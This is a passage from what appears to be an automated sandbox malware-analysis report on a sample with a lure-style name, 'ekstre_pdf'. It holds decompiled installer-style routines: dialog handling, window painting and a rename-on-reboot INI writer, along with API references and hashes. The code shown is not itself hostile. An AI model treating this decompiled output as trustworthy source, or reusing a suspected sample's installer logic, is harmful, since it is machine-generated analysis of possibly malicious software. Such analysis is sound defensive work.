											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x1006]);
									} while (_v24 <  *0x47af2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x450260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x47af60 = _t291;
					 *0x450260 = GlobalAlloc(0x40,  *0x47af2c << 2);
					_t258 = LoadImageW( *0x47af00, 0x6e, 0, 0, 0, 0);
					 *0x450254 =  *0x450254 | 0xffffffff;
					_t297 = _t258;
					 *0x45025c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x45024c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x45024c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x47af2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x450260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x450260 + _t300 * 4) = _t284;
									_v16 =  *( *0x450260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x4018]);
							_v32 = _t319;
						} while (_t300 <  *0x47af2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404f0d
0x00404f26
0x00404f2b
0x00404f33
0x00404f39
0x00404f4f
0x00404f52
0x0040517d
0x00405184
0x00405198
0x00405186
0x00405188
0x0040518b
0x0040518c
0x00405193
0x00405193
0x004051a4
0x004051b2
0x004051b5
0x004051cb
0x00405240
0x00405243
0x00405245
0x0040524f
0x0040525d
0x0040525d
0x0040525f
0x00405269
0x0040526f
0x00405272
0x00405275
0x00405290
0x00405277
0x00405281
0x00405281
0x00405275
0x00405269
0x00000000
0x00405243
0x004051d0
0x004051db
0x004051e0
0x004051e7
0x004051ec
0x004051f0
0x004051fb
0x004051fb
0x004051ff
0x00405203
0x00405207
0x0040521a
0x00405209
0x00405209
0x00405210
0x00405216
0x00405212
0x00405212
0x00405212
0x00405210
0x0040521e
0x00405220
0x00405233
0x00405236
0x00405239
0x00405239
0x00405203
0x00000000
0x004051f0
0x004051d2
0x004051d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405293
0x00405293
0x0040529a
0x0040530b
0x00405313
0x0040531b
0x0040531b
0x00405324
0x00405326
0x0040532d
0x00405330
0x00405330
0x00405336
0x0040533d
0x00405340
0x00405340
0x00405346
0x0040534c
0x00405352
0x00405352
0x0040535f
0x004054c0
0x004054c7
0x004054e4
0x004054ea
0x004054fc
0x004054fc
0x00000000
0x00405365
0x00405367
0x0040536c
0x00405371
0x00405376
0x00405378
0x00405378
0x00405379
0x0040537a
0x0040537c
0x0040537c
0x00405384
0x004053c5
0x004053c7
0x004053d7
0x004053da
0x004053df
0x004053e6
0x004053e9
0x0040548b
0x00405494
0x0040549c
0x0040549c
0x004054aa
0x004054bb
0x004054bb
0x00000000
0x004054aa
0x004053ef
0x004053f2
0x004053f8
0x004053fd
0x004053ff
0x00405401
0x00405407
0x0040540e
0x00405413
0x0040541a
0x0040541d
0x0040541d
0x00405424
0x00405430
0x00405434
0x00405436
0x00405436
0x00405426
0x00405428
0x00405428
0x00405456
0x00405462
0x00405471
0x00405471
0x00405473
0x00405476
0x0040547f
0x00000000
0x00405386
0x00405391
0x00405394
0x00405399
0x0040539b
0x0040539f
0x004053af
0x004053b9
0x004053bb
0x004053be
0x00000000
0x00000000
0x00000000
0x00000000
0x004053a1
0x004053a1
0x004053a7
0x004053a9
0x004053a9
0x004053aa
0x004053ab
0x00000000
0x004053a1
0x00405384
0x0040535f
0x004052a2
0x00000000
0x004052b8
0x004052c2
0x004052c7
0x00000000
0x00000000
0x004052d9
0x004052de
0x004052ea
0x004052ea
0x004052ec
0x004052fb
0x004052fd
0x00405301
0x00405304
0x00000000
0x00405304
0x004052a2
0x00404f58
0x00404f5d
0x00404f66
0x00404f6d
0x00404f7f
0x00404f8a
0x00404f90
0x00404f9e
0x00404fb2
0x00404fb7
0x00404fc4
0x00404fc9
0x00404fdf
0x00404ff0
0x00404ffd
0x00404ffd
0x00405000
0x00405006
0x00405008
0x0040500b
0x00405010
0x00405015
0x00405017
0x00405017
0x00405037
0x00405037
0x00405039
0x0040503a
0x0040503f
0x00405045
0x00405049
0x0040504e
0x00405056
0x0040505a
0x0040505f
0x00405064
0x0040506c
0x0040506f
0x0040513f
0x00405152
0x00000000
0x00405075
0x00405078
0x0040507b
0x0040507e
0x0040507e
0x00405084
0x0040508d
0x00405090
0x00405094
0x00405097
0x0040509a
0x004050a3
0x004050ac
0x004050af
0x004050b2
0x004050b5
0x004050f3
0x0040511e
0x004050f5
0x00405104
0x00405104
0x004050b7
0x004050ba
0x004050c8
0x004050d2
0x004050da
0x004050e1
0x004050ec
0x004050ec
0x004050b5
0x00405124
0x00405125
0x00405131
0x00405131
0x0040513d
0x00405158
0x0040515b
0x00405178
0x00000000
0x0040515d
0x00405162
0x0040516b
0x004054fe
0x00405510
0x00405510
0x0040515b
0x00000000
0x0040513d
0x0040506f

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,?,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,?), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

, xrefs: 004054D4
M, xrefs: 004050BA
N, xrefs: 0040519B

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: e2b724a12b8feb8f927af66141d2913d6ef209d2767e12a02e36ebe3279da5e4
Instruction ID: 59d253adfd9ff3aac27d97b0cfd1e8b5639e19900afb4c1ae9c919b188d37439
Opcode Fuzzy Hash: e2b724a12b8feb8f927af66141d2913d6ef209d2767e12a02e36ebe3279da5e4
Instruction Fuzzy Hash: 2302AE70900608AFDB20DFA5CD49AAF7BB5FB84315F10817AF614BA2E1D7788991CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x440234 =  *0x440234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x46aea0;
							if(_t103 - _t113 < 0x4000) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push("true");
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x47af08, 0x111, "true", 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x47af08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x440234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x448240; // 0x66d114
						_t29 = _t69 + 0x14; // 0x66d128
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x472edc - 4 + _t75 * 4);
				}
				_t76 =  *0x47af38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, "true", 0);
				_t92 =  *( *0x47af10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x440234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x440234 = 0;
				return 0;
			}

0x0040466a
0x00404797
0x004047f4
0x004047f8
0x004048c5
0x004048c7
0x004048c7
0x004048cd
0x004048cd
0x004048d0
0x00000000
0x004048d7
0x00404806
0x0040480c
0x00404816
0x00404821
0x00404824
0x00404827
0x00404832
0x00404835
0x0040483c
0x00404849
0x0040485a
0x00404860
0x00404868
0x00404876
0x0040487c
0x0040487c
0x0040483c
0x00404886
0x00000000
0x00404891
0x00404895
0x004048a5
0x004048a5
0x004048ab
0x004048b7
0x004048b7
0x00000000
0x004048bb
0x00404886
0x004047a2
0x00000000
0x004047b4
0x004047b4
0x004047b9
0x004047b9
0x004047bf
0x00000000
0x00000000
0x004047e8
0x004047ea
0x004047ef
0x00000000
0x004047ef
0x004047a2
0x00404670
0x00404673
0x00404678
0x00404689
0x00404689
0x00404691
0x00404694
0x00404698
0x0040469b
0x0040469f
0x004046a2
0x004046a5
0x004046a8
0x004046af
0x004046b1
0x004046b1
0x004046bb
0x004046c8
0x004046d2
0x004046d7
0x004046da
0x004046df
0x004046f6
0x004046fd
0x00404710
0x00404713
0x00404727
0x0040472e
0x00404733
0x00404738
0x00404738
0x00404746
0x00404754
0x00404766
0x0040476b
0x0040477b
0x0040477d
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,?,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

N, xrefs: 004047F4
Call, xrefs: 00404835

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: f106b9d2da662117c4d54a8106993e5de012414c03e03da26ed482651103bb79
Instruction ID: 111f306896fe74a09566b2161473f6e90a6ab78f0b9cf94dedbf548ec0f95215
Opcode Fuzzy Hash: f106b9d2da662117c4d54a8106993e5de012414c03e03da26ed482651103bb79
Instruction Fuzzy Hash: AA61B1B5900609BFDB10AF60DD85E6A7BA9FB44304F00843AFB05B62D0D778AD61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x47af10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x472f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x47af08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00472F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: d28a190340fd81edcf2ea86847917be9e4e710c6dab31e5707d7a8728df30fd9
Instruction ID: 0e7851928d9be6a7ecd0c3bf21c74fa9cacf1a5b73995c710b0fec89f65bae70
Opcode Fuzzy Hash: d28a190340fd81edcf2ea86847917be9e4e710c6dab31e5707d7a8728df30fd9
Instruction Fuzzy Hash: 77418B71800209AFCF058FA5CE459AF7BB9FF44315F00802AF995AA1A0C7749A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x468908 = 0x55004e;
				 *0x46890c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x469108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x468508, "%ls=%ls\r\n", 0x468908, 0x469108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x469108, 0x469108,  *((intOrPtr*)( *0x47af10 + 0x128)));
						_t12 = E0040602D(0x469108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x468508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, "true"));
					_t12 = GetShortPathNameW(_t44, 0x468908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406183
0x0040618c
0x00406193
0x0040619d
0x004061b1
0x004061d9
0x004061e4
0x004061e8
0x00406208
0x0040620f
0x00406219
0x00406226
0x0040622b
0x00406230
0x00406234
0x00406243
0x00406245
0x00406252
0x00406256
0x004062f1
0x00000000
0x0040626c
0x00406279
0x0040629d
0x004062a1
0x004062c0
0x004062c4
0x004062c4
0x004062c6
0x004062cf
0x004062da
0x004062e5
0x004062eb
0x00000000
0x004062eb
0x004062a3
0x004062a6
0x004062b1
0x004062ad
0x004062af
0x004062b0
0x004062b0
0x004062b8
0x004062ba
0x00000000
0x004062ba
0x00406284
0x0040628a
0x00000000
0x0040628a
0x00406256
0x00406234
0x004061b3
0x004061be
0x004061c7
0x004061cb
0x00000000
0x00000000
0x004061cb
0x004062fc

APIs

